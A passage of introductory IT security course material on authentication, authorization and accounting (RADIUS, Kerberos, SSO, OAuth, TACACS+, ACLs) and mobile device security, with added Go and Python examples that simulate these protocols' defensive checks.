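	client := func(serial int64, cn string) (*x509.Certificate, *ecdsa.PrivateKey, error) {
		return mint(&x509.Certificate{SerialNumber: big.NewInt(serial), Subject: pkix.Name{CommonName: cn},
			NotBefore: now.Add(-time.Hour), NotAfter: now.Add(11 * time.Hour),
			KeyUsage:    x509.KeyUsageDigitalSignature,
			ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}}, caCert, caKey)
	}
	if s.ValidCert, s.ValidKey, err = client(2, "alice-laptop"); err != nil {
		return nil, err
	}
	if s.RevokedCert, _, err = client(3, "stolen-laptop"); err != nil {
		return nil, err
	}
	s.Verifier.Revoked[s.RevokedCert.SerialNumber.String()] = true // the CA lists it on its CRL
	return s, nil
}
```

Run CheckCertificate against the same certificate at different times to see both dates fail: two hours before now it is rejected as not yet valid, thirteen hours later as expired. The revoked certificate has a perfectly good chain and still fails, which is why a verifier that skips the CRL is incomplete. And because the signature covers a fresh random challenge, a signature captured from an earlier session cannot be replayed against a new one.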

RADIUS, or Remote Authentication Dial-In User Service, is a protocol that provides AAA services for users on a network. It's a very common protocol used to manage access to internal networks, Wi-Fi networks, email services, and VPN services. Originally designed to transport authentication information for remote dial-up users, it's evolved to carry a wide variety of standard authentication protocols, like EAP, or Extensible Authentication Protocol. While it's unlikely that you'd be responsible for configuring a RADIUS server as an IT support specialist, you might be supporting clients that authenticate against a RADIUS back-end server. In those cases, it's good to understand what role the RADIUS server plays in this authentication scenario, so you're better prepared to troubleshoot issues that may come up.

Clients who want to authenticate to a RADIUS server don't directly interact with it. Instead, when a client wants to access a resource that's protected, the client will present authentication credentials to a NAS, or network access server, which will relay the credentials to the RADIUS server. The RADIUS server will then verify the credentials using a configured authentication scheme. RADIUS servers can verify user authentication information stored in a flat file, or can plug into external sources like SQL databases, LDAP, Kerberos, or Active Directory. Once the RADIUS server has evaluated the user authentication request, it replies with one of three messages: Access-Reject, Access-Challenge, or Access-Accept.
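To make the three-party exchange concrete, here is an added Go example (not code from the course): the NAS builds an Access-Request on the user's behalf, the RADIUS server checks it against a user store and answers Access-Accept or Access-Reject, and the NAS verifies that the reply really came from a server holding the shared secret. The packet layout, the Response Authenticator and the User-Password hiding follow RFC 2865. The user name, password and shared secret are constructed, the user store is an in-memory map standing in for a flat file, and the packets are passed between the functions as Go values rather than sent over UDP.

```go
package main

import (
	"bytes"
	"crypto/md5"
	"crypto/rand"
	"crypto/subtle"
	"encoding/binary"
	"errors"
)

// RFC 2865 packet codes and the two attribute types used here.
const (
	AccessRequest, AccessAccept, AccessReject, AccessChallenge uint8 = 1, 2, 3, 11
	AttrUserName, AttrUserPassword                             uint8 = 1, 2
)

type Attr struct {
	Type  uint8
	Value []byte
}

// Packet is the 20-byte RADIUS header (code, identifier, length, authenticator) plus TLV attributes.
type Packet struct {
	Code, ID      uint8
	Authenticator [16]byte
	Attrs         []Attr
}

// Encode produces the wire form; the Response Authenticator is an MD5 over exactly these bytes.
func (p Packet) Encode() []byte {
	out := append([]byte{p.Code, p.ID, 0, 0}, p.Authenticator[:]...)
	for _, a := range p.Attrs {
		out = append(append(out, a.Type, uint8(len(a.Value)+2)), a.Value...)
	}
	binary.BigEndian.PutUint16(out[2:], uint16(len(out)))
	return out
}

func (p Packet) attr(t uint8) []byte {
	for _, a := range p.Attrs {
		if a.Type == t {
			return a.Value
		}
	}
	return nil
}

// xorPassword is the RFC 2865 User-Password scheme: each 16-byte block is XORed with
// MD5(secret || previous block), the first block using the Request Authenticator. Hiding
// chains on the ciphertext it produces and recovering on the ciphertext it was given, so
// one routine serves both the NAS and the server.
func xorPassword(in []byte, secret string, ra [16]byte, hide bool) []byte {
	buf := append([]byte{}, in...)
	for len(buf) == 0 || len(buf)%16 != 0 {
		buf = append(buf, 0) // zero-pad to whole blocks; an empty password still takes one
	}
	out, prev := make([]byte, len(buf)), ra[:]
	for i := 0; i < len(buf); i += 16 {
		b := md5.Sum(append([]byte(secret), prev...))
		for j := range b {
			out[i+j] = buf[i+j] ^ b[j]
		}
		if prev = buf[i : i+16]; hide {
			prev = out[i : i+16]
		}
	}
	return out
}

// NewAccessRequest is what the NAS sends on the user's behalf: a random Request
// Authenticator, User-Name in the clear and User-Password hidden under the shared secret.
func NewAccessRequest(id uint8, user, password, secret string) (Packet, error) {
	p := Packet{Code: AccessRequest, ID: id}
	if _, err := rand.Read(p.Authenticator[:]); err != nil {
		return Packet{}, err
	}
	p.Attrs = []Attr{{AttrUserName, []byte(user)},
		{AttrUserPassword, xorPassword([]byte(password), secret, p.Authenticator, true)}}
	return p, nil
}

// responseAuthenticator is MD5(Code | ID | Length | RequestAuth | Attributes | Secret):
// it ties a reply to one request and proves the sender knows the shared secret.
func responseAuthenticator(resp, req Packet, secret string) [16]byte {
	resp.Authenticator = req.Authenticator
	return md5.Sum(append(resp.Encode(), secret...))
}

// HandleRequest is the RADIUS server: recover the password, check it against the user
// store (a flat file in the simplest deployments) and answer Access-Accept or Access-Reject.
func HandleRequest(req Packet, secret string, users map[string]string) (Packet, error) {
	if req.Code != AccessRequest {
		return Packet{}, errors.New("not an Access-Request")
	}
	got := bytes.TrimRight(xorPassword(req.attr(AttrUserPassword), secret, req.Authenticator, false), "\x00")
	want, known := users[string(req.attr(AttrUserName))]
	resp := Packet{Code: AccessReject, ID: req.ID}
	if known && subtle.ConstantTimeCompare(got, []byte(want)) == 1 {
		resp.Code = AccessAccept
	}
	resp.Authenticator = responseAuthenticator(resp, req, secret)
	return resp, nil
}

// VerifyResponse is the NAS-side check: a reply whose authenticator does not match was not
// produced by a server holding our secret, or does not belong to our request.
func VerifyResponse(resp, req Packet, secret string) bool {
	return resp.ID == req.ID && responseAuthenticator(resp, req, secret) == resp.Authenticator
}
```

Two properties of the shared secret are worth noticing. The password never crosses the wire in the clear: it is XORed with MD5(secret || Request Authenticator), so a captured request is useless without the secret, and a NAS configured with the wrong secret produces a password the server recovers as garbage and rejects. The Response Authenticator is what stops a device on the path from forging an Access-Accept: without the secret the MD5 does not match and the NAS discards the reply. MD5-based hiding is also why RADIUS traffic should itself travel over a protected path, such as an IPsec tunnel or RadSec (RADIUS over TLS).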

Kerberos is a network authentication protocol that uses tickets to allow entities to prove their identity over potentially insecure channels and to provide mutual authentication. It also uses symmetric encryption to protect protocol messages from eavesdropping and replay attacks. The name Kerberos is taken from the Greek mythical character of the same name, a three-headed guard dog protecting the gates to Hades, the underworld. Seems like an appropriate choice for an authentication protocol, don't you think?

Kerberos was originally developed at the Massachusetts Institute of Technology in the US and was published in the 1980s as version 4. Years later, in 1993, version 5 was published. Today, Kerberos supports AES encryption for confidentiality and implements checksums to ensure data integrity. When joined to a Windows domain, Windows 2000 and newer versions will use Kerberos as the default authentication protocol. Microsoft also implemented their own Kerberos service, with some modifications to the open protocol, like the addition of the RC4 stream cipher.

We mentioned tickets earlier, which are a sort of token that proves your identity. They can be used for authenticating to services protected using Kerberos, or in other words, services within the Kerberos realm. The authentication tickets let users authenticate to services without requiring username and password authentication for every service individually. A ticket will expire after some time, but there are provisions for automatic, transparent renewal of the ticket.

Let's run down the details of how the Kerberos protocol operates. First, a user that wants to authenticate enters their username and password on their client machine. Their Kerberos client software will then take the password and generate a symmetric encryption key from it. Next, the client sends a plaintext message to the Kerberos AS, or authentication server, which includes the user ID of the authenticating user. Neither the password nor the secret key derived from the password is transmitted. The AS uses the user ID to check if there's an account in the authentication database, like an Active Directory server. If so, the AS will generate the secret key using the hashed password stored on the key distribution center server. The AS will then use the secret key to encrypt and send a message containing the client/TGS session key. This is a secret key used for encrypting communications with the ticket granting service, or TGS, which is already known by the authentication server. The AS also sends a second message with a ticket granting ticket, or TGT, which is encrypted using the TGS secret key. The ticket granting ticket has information like the client ID, ticket validity period, and the client/TGS session key. The first message can be decrypted using the shared secret key derived from the user password, which gives the client the client/TGS session key. The client can't decrypt the second message, the TGT, since that's encrypted with the TGS secret key; it simply holds on to it to present to the TGS. Now the client has enough information to authenticate with the ticket granting service.

Since the client has authenticated and received a valid ticket granting ticket, it can use the ticket granting ticket to request access to services from within the Kerberos realm. This is done by sending a message to the ticket granting service with the encrypted ticket granting ticket received from the AS earlier, along with the service name or ID the client is requesting access to. The client also sends a message containing an authenticator, which has the client ID and a timestamp, encrypted with the client/TGS session key from the AS. The ticket granting service decrypts the ticket granting ticket using the ticket granting service secret key, which provides the ticket granting service with the client/TGS session key. It then uses that key to decrypt the authenticator message. Next, it checks the client ID of these two messages to ensure they match. If they do, it sends two messages back to the client. The first one contains the client-to-server ticket, which is comprised of the client ID, client address, validity period, and the client/server session key, encrypted using the service's secret key. The second message contains the client/server session key itself, and is encrypted using the client/TGS session key.

Finally, the client has enough information to authenticate itself to the service server, or SS. The client sends two messages to the SS. The first message is the encrypted client-to-server ticket received from the ticket granting service. The second is a new authenticator with the client ID and timestamp, encrypted using the client/server session key. The SS decrypts the first message using its secret key, which provides it with the client/server session key. The key is then used to decrypt the second message, and it compares the client ID in the authenticator to the one included in the client-to-server ticket. If these IDs match, then the SS sends a message containing the timestamp from the client-supplied authenticator, encrypted using the client/server session key. The client then decrypts this message and checks that the timestamp is correct, authenticating the server. If this all succeeds, then the server grants the client access to the requested service. Wow, okay, are you with me? I know that was a lot.

Kerberos has received some criticism because it's a single monolithic service. This creates a single-point-of-failure danger: if the Kerberos service goes down, new users won't be able to authenticate and log in. Aside from availability issues, if the central Kerberos server is compromised, the attacker would be able to impersonate any user by generating valid Kerberos tickets for their user account. Kerberos enforces strict time requirements, requiring the client and server clocks to be relatively closely synchronized; otherwise, authentication will fail. This is usually accomplished by using NTP to keep both parties synchronized with an NTP server. The trust model of Kerberos is also problematic, since it requires clients and services to have an established trust with the Kerberos server in order to authenticate using Kerberos. This means it's not possible for users to authenticate using Kerberos from unknown or untrusted clients. So things like BYOD, or bring your own device, and cloud computing are incompatible, or at least very challenging to implement securely, with Kerberos authentication.

Now, as an IT support specialist, you're likely to encounter Kerberos authentication, especially in environments running Microsoft Active Directory. Understanding how the underlying protocol functions will help when troubleshooting issues that may come with it.
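The exchange just described, as an added Go example that is not part of the course: the same three steps, the AS exchange, the TGS exchange and the final exchange with the service server, with the KDC's two roles and the service server reduced to functions. It generalizes one thing the walkthrough shows twice: issuing a ticket (a session key delivered to the client under a key it holds, plus a ticket sealed under the target's key) and verifying one (ticket, authenticator, matching client IDs, validity, freshness) are the same operations whether the target is the TGS or a service, so each is written once. It simplifies in ways worth naming: messages are JSON sealed with AES-256-GCM in place of Kerberos' encryption types, the user's long-term key is a plain SHA-256 of the password rather than the salted PBKDF2 string-to-key function, the five-minute clock-skew limit is an assumed value, and there is no pre-authentication, ticket renewal or client address checking. Principal names, passwords and the realm are constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
	"time"
)

// MaxClockSkew bounds how far an authenticator's timestamp may drift from the verifier's
// clock (assumed value; MIT Kerberos and Active Directory both default to five minutes).
const MaxClockSkew = 5 * time.Minute

// Msg is every protocol message: a ticket sets Client, Expires and Key (the session key),
// an authenticator sets Client and Stamp, and a key delivery or timestamp echo sets one field.
type Msg struct {
	Client         string
	Expires, Stamp time.Time
	Key            []byte
}

// seal and open stand in for Kerberos' AES encryption types (JSON under AES-256-GCM).
// Every key in this example is 32 bytes, so the cipher constructors cannot fail.
func seal(key []byte, m Msg) []byte {
	pt, _ := json.Marshal(m)
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	nonce := make([]byte, gcm.NonceSize())
	rand.Read(nonce)
	return gcm.Seal(nonce, nonce, pt, nil)
}

func open(key, ct []byte) (m Msg, err error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(ct) < 12 {
		return m, errors.New("bad key or truncated message")
	}
	gcm, _ := cipher.NewGCM(block)
	pt, err := gcm.Open(nil, ct[:12], ct[12:], nil)
	if err != nil {
		return m, errors.New("wrong key or tampered message")
	}
	return m, json.Unmarshal(pt, &m)
}

// StringToKey derives the user's long-term key from the password (assumption: plain
// SHA-256 in place of Kerberos' salted PBKDF2 string-to-key; the realm is constructed).
func StringToKey(user, password string) []byte {
	h := sha256.Sum256([]byte(user + "@EXAMPLE.COM:" + password))
	return h[:]
}

// IssueTicket is what the AS does for the TGS and the TGS does for a service: mint a session
// key, deliver it under holderKey (the password-derived key, later the client/TGS session key)
// and embed it in a ticket sealed under the target's key, which the client carries but cannot read.
func IssueTicket(holderKey, serviceKey []byte, client string, expires time.Time) (encKey, ticket []byte) {
	sk := make([]byte, 32)
	rand.Read(sk)
	return seal(holderKey, Msg{Key: sk}), seal(serviceKey, Msg{Client: client, Expires: expires, Key: sk})
}

// NewAuthenticator is the client's timestamped proof that it holds the session key.
func NewAuthenticator(sessionKey []byte, client string, now time.Time) []byte {
	return seal(sessionKey, Msg{Client: client, Stamp: now})
}

// VerifyTicket is what the TGS and every service server do: open the ticket with their own
// key and the authenticator with the session key inside it, then require matching client IDs,
// an unexpired ticket and a fresh timestamp. The echoed timestamp is the mutual-auth reply.
func VerifyTicket(serviceKey, ticket, auth []byte, now time.Time) (Msg, []byte, error) {
	t, err := open(serviceKey, ticket)
	if err != nil {
		return t, nil, fmt.Errorf("ticket: %w", err)
	}
	a, err := open(t.Key, auth)
	if err != nil {
		return t, nil, fmt.Errorf("authenticator: %w", err)
	}
	switch skew := now.Sub(a.Stamp); {
	case a.Client != t.Client:
		return t, nil, errors.New("authenticator and ticket name different clients")
	case now.After(t.Expires):
		return t, nil, errors.New("ticket expired")
	case skew > MaxClockSkew || skew < -MaxClockSkew:
		return t, nil, fmt.Errorf("clock skew %v exceeds %v", skew, MaxClockSkew)
	}
	return t, seal(t.Key, Msg{Stamp: a.Stamp}), nil
}

// KDC holds the AS database (user keys), the TGS key and the registered services' keys.
type KDC struct {
	UserKeys, ServiceKeys map[string][]byte
	TGSKey                []byte
}

// Login is the whole client-side flow: AS exchange, TGS exchange, then the exchange with the
// service. clientNow and serverNow are separate clocks so that skew can be exercised.
func Login(kdc *KDC, user, password, service string, clientNow, serverNow time.Time) error {
	userKey, ok := kdc.UserKeys[user]
	if !ok {
		return errors.New("AS: unknown principal")
	}
	encKey, tgt := IssueTicket(userKey, kdc.TGSKey, user, serverNow.Add(10*time.Hour))
	tgs, err := open(StringToKey(user, password), encKey) // a wrong password fails here
	if err != nil {
		return fmt.Errorf("client: %w", err)
	}
	t, _, err := VerifyTicket(kdc.TGSKey, tgt, NewAuthenticator(tgs.Key, user, clientNow), serverNow)
	if err != nil {
		return fmt.Errorf("TGS: %w", err)
	}
	svcKey, ok := kdc.ServiceKeys[service]
	if !ok {
		return errors.New("TGS: unknown service")
	}
	encKey, svcTicket := IssueTicket(t.Key, svcKey, t.Client, t.Expires)
	svc, err := open(tgs.Key, encKey)
	if err != nil {
		return err
	}
	_, reply, err := VerifyTicket(svcKey, svcTicket, NewAuthenticator(svc.Key, user, clientNow), serverNow)
	if err != nil {
		return fmt.Errorf("service: %w", err)
	}
	if echo, err := open(svc.Key, reply); err != nil || !echo.Stamp.Equal(clientNow) {
		return errors.New("client: service failed mutual authentication")
	}
	return nil
}
```

Two points from the walkthrough show up directly. The client never sends the password or the key derived from it; a wrong password simply fails to decrypt the AS reply, and the KDC learns nothing either way. And the authenticator's timestamp is compared against the verifier's clock, so a client whose clock is ten minutes off is rejected even with the right password, which is exactly the failure that keeping both sides on NTP prevents.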


Single sign-on, or SSO, is an authentication concept that allows users to authenticate once to be granted access to a lot of different services and applications. Since re-authentication for each service isn't needed, users don't need multiple sets of usernames and passwords across a mix of applications and services. SSO is accomplished by authenticating to a central authentication server, like an LDAP server. This then provides a cookie or token that can be used to get access to applications configured to use SSO. Kerberos is actually a good example of an SSO authentication service. The user would authenticate against the Kerberos service once, which would then grant them a ticket-granting ticket. This can then be presented to the ticket-granting service in place of traditional credentials. The user can enter credentials once and gain access to a variety of services.

SSO is really convenient. It allows users to have one set of credentials that grant access to lots of services, making it less likely that passwords will be written down or stored insecurely. This should also reduce the overhead for password assistance support and removes time spent re-authenticating throughout the workday. So what's the downside? An attacker that manages to compromise an account has a lot more access under an SSO scheme. User credentials will grant access to all applications and services that that account is permitted to access. A big plug here for using multi-factor authentication in conjunction with an SSO scheme. SSO also opens a new channel of attack: theft of SSO session cookies or tokens. Instead of targeting credentials directly, attackers can try to steal the SSO tokens themselves, which will permit wide access, even if only for a short amount of time. Stealing these tokens also lets an attacker dodge multi-factor authentication protections, since the session token permits access without requiring full authentication until the token expires.

An example of an SSO system is the OpenID decentralized authentication system. This is an open standard that allows participating sites, known as relying parties, to allow authentication of users utilizing a third-party authentication service. This allows sites to permit authentication without requiring the site itself to have authentication infrastructure, which can be tricky to implement and maintain. It also lets users access a site without requiring them to create a new account, simplifying access management across a wide variety of sites. Instead, a user just needs to already have an account with an identity provider. To ask for authentication, first, the relying party looks up the OpenID provider, then establishes a shared secret with the provider if one doesn't already exist. This shared secret will be used to validate the OpenID provider's messages. Then the user will be redirected, or asked to authenticate in a new window, through the identity provider's login flow. Once authenticated, the user will be prompted to confirm whether they trust the relying party or not. Once confirmed, credentials are relayed to the relying party, typically in the form of a token, not actual user credentials, which indicates the user is now authenticated to the service.

Earlier we covered authentication, the first component of the three A's of security. Next up, we'll cover authorization, which is usually tightly coupled with authentication. While authentication is related to verifying the identity of a user, authorization pertains to describing what the user account has access to or doesn't have access to. These are separate and distinct components of AAA that have different purposes. A user may successfully authenticate to a system by presenting valid credentials, but if the username they authenticated as isn't also authorized to access the system in question, they'll be denied access. When we talked about Kerberos earlier, the user authenticated and received a ticket granting ticket. This can then be used to request access to a specific service by sending the request to the ticket granting service. This is when authorization comes into play, since the ticket granting service will decide whether or not the user in question is permitted to access the service being requested. If they're not permitted, or authorized, to access the service, the request would be denied by the ticket granting service. If the user is authorized, the ticket granting service would return a ticket which authorizes the user to access the service. One very popular open standard for authorization and access delegation is OAuth, used by companies like Google, Facebook, and Microsoft.

Mobile Security Methods

Laptop computers, tablets, smartphones, and other mobile devices allow people to remain
productive from various locations, such as at home or while traveling. This increased
flexibility raises various security concerns that IT departments need to address. This reading
provides information about the current security measures used to protect mobile devices. 
Common mobile security threats and challenges 

Many of the security threats associated with mobile devices are the same as those of
traditionally networked devices, such as hacking and malware. However, mobile devices face
additional threats that other devices do not. 

Here are some threats facing mobile device security:

1. Phishing: Phishing attacks can use SMS messaging, email accounts, messages via numerous social media applications, or malicious links in browsers to target your mobile devices.
2. Malicious applications (malware): Malware can take the form of apps designed to collect and transmit personal and corporate information to third parties.
3. Insecure Wi-Fi and “meddler in the middle” attacks: An attacker places themself in the middle of two hosts that think they're communicating directly. The attacker may monitor the information from these hosts and potentially modify it in transit. Open or "free" Wi-Fi hotspots are especially susceptible to meddler in the middle and similar attacks.
4. Poor update habits for devices and apps: An example is failure to install security patches regularly deployed through software and firmware updates. Unpatched devices and applications often contain known vulnerabilities that attackers may exploit to collect sensitive data.

You can imagine how all these issues could threaten confidentiality, integrity, or availability (the CIA triad), but confidentiality is of particular concern for mobile security.

Security measures used to protect mobile devices

There are several security measures in place to protect mobile devices from these security
concerns. 

Screen Locks
Screen locks are methods for preventing unauthorized access to a device. They can be
particularly effective for diminishing risks associated with the loss or theft of the device.
These measures include: 

- Facial recognition: uses a device’s camera to unlock the device once the user’s face is recognized
- PIN codes: uses a sequence of four or more numbers to unlock the device
- Fingerprint recognition: matches a user’s fingerprint with a saved template of the fingerprint to unlock the device
- Pattern locks: uses a pattern that users must trace to unlock the device
Remote wipes 
Remote wipes are methods to remove data from a device remotely. Remote wiping is another
way to diminish risks associated with the loss or theft of a device.

Other security measures
Additional measures that protect mobile devices include:

- Locator applications: apps that help users find lost devices
- OS updates: security patches regularly deployed through operating system updates (as well as firmware and application updates)
- Device encryption: encryption techniques that protect the data on the device from unauthorized access
- Remote backup and management applications: apps that back up device data and allow administrators to remotely remove applications that compromise security
- Failed login attempt restrictions: stops access, either completely or for a set period of time, after too many failed attempts to log in
- Antivirus/antimalware: software packages for mobile devices, often offered by the same vendors as desktop antivirus programs
- Firewalls: either devices or software that check incoming network traffic and keep out unwanted traffic

Policies and procedures 

IT departments establish policies and procedures to ensure users don’t make security
mistakes. They typically include mobile-specific policies such as acceptable use guidelines,
preferred mobile security practices, and security platforms or services. 

Once IT staff and management collaborate to build a mobile security policy, there is still work
to do. Organizations must find the best way to outline this policy and communicate it to
users. A policy is only effective if users understand and adhere to it.

Key takeaways:

As your organization embraces the advantages of mobile devices and wireless networks, your
IT security strategies must account for the specific risks, vulnerabilities, and threats
associated with mobile computing by: 

1. Monitoring for common mobile security concerns such as phishing, malicious applications, insecure Wi-Fi, and poor update habits, and applying the current methods for addressing them
2. Implementing security measures to protect mobile devices, like screen locks and remote wipes 
3. Providing clear mobile security policies and procedures and communicating them to users
Citations:

1. Top 4 mobile security threats and challenges for businesses
   https://www.techtarget.com/searchmobilecomputing/tip/Top-
   mobile-security-threats-and-challenges-for-businesses
2. The ultimate guide to mobile device security in the workplace
   https://www.techtarget.com/searchmobilecomputing/The-ultim
   guide-to-mobile-device-security-in-the-workplace
3. What Is the CIA Triad? Understanding the significance of the three foundational information security principles: confidentiality, integrity, and availability.
   https://www.f5.com/labs/articles/education/what-is-the-cia-tri

OAuth is an open standard that allows users to grant third-party websites and applications access to their information without sharing account credentials. This can be thought of as a form of access delegation, because access to the user's account is being delegated to the third party. This is accomplished by prompting the user to confirm that they agree to permit the third party access to certain information about their account. Typically, this prompt will specifically list which pieces of information or access are being requested. Once confirmed, the identity provider will supply the third party with a token that gives them access to the user's information. This token can then be used by the third party to access data or services offered by the identity provider directly on behalf of the user. OAuth is commonly used to grant third-party applications access to APIs offered by large internet companies like Google, Microsoft and Facebook.

Let's say you want to use a third-party meme creation website. This website lets you create memes using templates and gives you the option to save your creations and email them to your friends. Instead of the site sending the emails directly, which would appear to be coming from an address your friends wouldn't recognize, the site uses OAuth to get permission to send the memes using your email account directly. This is done by making an OAuth request to your email provider. Once you approve this request, the email provider issues an access token to the site which grants the site access to your email account. The access token would have a scope which says that it can only be used to access email, not other services associated with the account. So it can access email, but not your cloud storage files or calendar, for example. It's important that users pay attention to what third party is requesting access, and what exactly they're granting access to.

OAuth permissions can be used in phishing-style attacks to gain access to accounts without requiring credentials to be compromised. This works by sending phishing emails to potential victims that look like legitimate OAuth authorization requests, which ask the user to grant access to some aspects of their account through OAuth. Once the user grants access, the attacker has access to the account through the OAuth authorization token. This was used in an OAuth-based worm attack in early 2017. There was a rash of phishing emails that appeared to be from a friend or colleague who wanted to share a Google Doc. When the sharing link was followed, the victim was prompted to log in and authorize access to email, documents and contacts for some third-party service which only identified itself by the name "Google Apps". But it was actually a malicious service that would then email contacts from the victim's email account, perpetuating the attack.

It's important to distinguish between OAuth and OpenID. OAuth is specifically an authorization system and OpenID is an authentication system, though they're usually used together. OpenID Connect is an authentication layer built on top of OAuth 2.0, designed to improve upon OpenID and build better integration with OAuth authorizations.
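The delegation flow just described, as an added example that is not code from the course or from any real identity provider: a simulated provider registers a third-party app, shows the consent prompt naming the app and the requested scope, issues a token limited to that scope, and refuses API calls outside it. The client names, scope strings and the revoke_app helper are constructed for the example.

```python
"""Scoped OAuth delegation, simulated end to end.

Added example, not code from the course or any real provider. Client names,
scope strings and the API operations are constructed for illustration.
"""
import secrets


class IdentityProvider:
    """Plays the email provider: registers apps, shows consent, issues tokens."""

    def __init__(self):
        self.apps = {}     # client_id -> display name (what the consent prompt shows)
        self.codes = {}    # one-time authorization code -> (client_id, user, scopes)
        self.tokens = {}   # access token -> (client_id, user, scopes)

    def register_app(self, client_id, display_name):
        self.apps[client_id] = display_name

    def consent_prompt(self, client_id, scopes):
        """The text the user must read before approving: who is asking, for what."""
        name = self.apps.get(client_id, "unknown application")
        return f'"{name}" wants to: {", ".join(sorted(scopes))}'

    def approve(self, client_id, user, scopes):
        """User clicked Allow; hand back a short-lived code, not the token itself."""
        code = secrets.token_urlsafe(16)
        self.codes[code] = (client_id, user, frozenset(scopes))
        return code

    def exchange_code(self, code):
        """The app redeems the code once (pop) for a token bound to the granted scopes."""
        client_id, user, scopes = self.codes.pop(code)
        token = secrets.token_urlsafe(24)
        self.tokens[token] = (client_id, user, scopes)
        return token

    def revoke_app(self, client_id):
        """Response to a consent-phishing grant: cut off every token issued to that app."""
        revoked = [t for t, (cid, _, _) in self.tokens.items() if cid == client_id]
        for t in revoked:
            del self.tokens[t]
        return len(revoked)

    def call_api(self, token, operation):
        """Resource server: every operation needs a scope; anything else is denied."""
        required = {"send_mail": "mail.send", "list_contacts": "contacts.read",
                    "read_calendar": "calendar.read"}
        if token not in self.tokens:
            return "denied: invalid or revoked token"
        client_id, user, scopes = self.tokens[token]
        if required[operation] not in scopes:
            return f"denied: token lacks scope {required[operation]}"
        return f"ok: {operation} as {user} on behalf of {self.apps[client_id]}"


def meme_site_flow(provider):
    """Walk through the lesson's scenario and return the consent text and API outcomes."""
    provider.register_app("meme-site", "Meme Maker")
    prompt = provider.consent_prompt("meme-site", {"mail.send"})   # what the user sees
    code = provider.approve("meme-site", "alice@example.test", {"mail.send"})
    token = provider.exchange_code(code)
    return {
        "prompt": prompt,
        "send_mail": provider.call_api(token, "send_mail"),         # in scope
        "read_calendar": provider.call_api(token, "read_calendar"), # out of scope
    }


if __name__ == "__main__":
    for key, value in meme_site_flow(IdentityProvider()).items():
        print(f"{key}: {value}")
```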
TACACS+ is a full AAA system: it also handles authorization along with authentication. This is done once a user is authenticated, by allowing or disallowing access for the user account to run certain commands or access certain devices. This lets you allow admin access for users that administer devices, while still allowing less privileged access to other users when necessary. Here's an example. Since your networking teams are responsible for configuring and maintaining your network switches, routers and other infrastructure, you'd give them admin access to your network equipment. Meanwhile, you can give limited read-only access to your support team, since they don't need to be able to make changes to switch configurations in their jobs; read-only access is enough for them to troubleshoot problems. The rest of the user accounts would have no access at all and wouldn't be permitted to connect to the networking infrastructure. More sophisticated or configurable AAA systems may even allow further refinement of authorization down to the command level. This gives you much more flexibility in how access is granted to specific users or groups in your organization.

RADIUS also allows you to authorize network access. For example, you may want to permit some users to have Wi-Fi and VPN access while others may not need this. When they authenticate to the RADIUS server, if the authentication succeeds, the RADIUS server returns configuration information to the network access server. This includes authorizations, which specify what network services the user is permitted to access.

Supplemental Reading for Authorization

This was used in an OAuth-based worm-like attack in early 2017, with a rash of phishing emails that appeared to be from a friend or colleague who wanted to share a Google Document.

An access control list, or ACL, is a way of defining permissions or authorizations for objects. The most common case you may encounter deals with file system permissions. A file system would have an ACL, which is a table or database with a list of entries specifying access rights for individuals or groups for various objects on the file system like folders, files, or programs. These individual access permissions per object are called access control entries, and they make up the ACL. Individual entries can define permissions controlling whether or not a user or group can read, write, or execute objects. ACLs are also used extensively in network security, applying access controls to routers, switches, and firewalls. Network ACLs are used for restricting and controlling access to hosts and the services running on hosts within your network. Network ACLs can be defined for incoming and outgoing traffic. They can also be used to restrict external access to systems and limit outgoing traffic to enforce policies or to prevent unauthorized outbound data transfers.

Last but not least, the final A of the triple AAAs of security is accounting. This means keeping records of what resources and services your users access, or what they did when they were using your systems. A critical component of this is auditing, which involves reviewing these records to ensure that nothing is out of the ordinary. If we're watching and recording usage of our systems but never actually checking the usage data, that's not super useful.

So what exactly do accounting systems keep track of? Well, that depends on the purpose and intent of the system. For example, a TACACS+ server would be more concerned with keeping track of user authentication, what systems they authenticated to, and what commands they ran during their session. This is because TACACS+ is a device access AAA system that manages who has access to your network devices and what they do on them. Cisco's AAA system supports accounting of individual commands executed, connections to and from network devices, commands executed in privileged mode, network services, and system details like configuration reloads or reboots.

RADIUS would track details like session duration, client location, and bandwidth or other resources used during the session. This is because RADIUS is a network access AAA system, so it tracks details about network access and usage. RADIUS accounting kicks off with the network access server (NAS) sending an Accounting-Request packet to the accounting server that contains an event record to be logged. This starts the accounting session on the server. The server replies with an Accounting-Response indicating that the message was received. The NAS will continue sending periodic accounting messages with statistics of the session until an accounting stop packet is received. RADIUS accounting can be used for billing purposes by ISPs, because it records the length of a session and the amount of data sent and received by the user. This data can also be used to enforce data or time quotas, limiting the duration of sessions or restricting the amount of data that can be sent or received. But this accounting information isn't detailed and won't contain specifics of what exactly the user did during the session. Information like websites visited or what protocols were used isn't recorded.
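The Accounting-Request / Accounting-Response exchange above, as an added example that is not code from the course: it builds the packets by hand in the RFC 2866 layout so you can see what the server actually receives, how the shared secret authenticates each message, and why the stored record holds only session length and byte counts. The shared secret, user name and session counters are constructed.

```python
"""RADIUS accounting exchange simulated at the packet level (RFC 2866 layout).

Added example, not course code. NAS sends Start / Interim-Update / Stop; the
server verifies the Request Authenticator, replies, and keeps session totals.
"""
import hashlib
import hmac
import struct

ACCT_REQUEST, ACCT_RESPONSE = 4, 5              # RADIUS packet codes
USER_NAME, ACCT_STATUS_TYPE = 1, 40             # attribute types used here
ACCT_INPUT_OCTETS, ACCT_OUTPUT_OCTETS = 42, 43
ACCT_SESSION_ID, ACCT_SESSION_TIME = 44, 46
START, STOP, INTERIM_UPDATE = 1, 2, 3           # Acct-Status-Type values
SHARED_SECRET = b"constructed-example-secret"   # constructed; never reuse a sample


def encode_attr(attr_type, value):
    """Type-Length-Value: integers are 4-byte big-endian, strings are raw bytes."""
    if isinstance(value, int):
        value = struct.pack(">I", value)
    elif isinstance(value, str):
        value = value.encode()
    return bytes([attr_type, len(value) + 2]) + value


def decode_attrs(data):
    attrs, i = {}, 0
    while i < len(data):
        attr_type, length = data[i], data[i + 1]
        attrs[attr_type] = data[i + 2:i + length]
        i += length
    return attrs


def build_acct_request(ident, secret, attributes):
    """Request Authenticator = MD5(Code+ID+Length+16 zero octets+Attributes+Secret)."""
    body = b"".join(encode_attr(t, v) for t, v in attributes)
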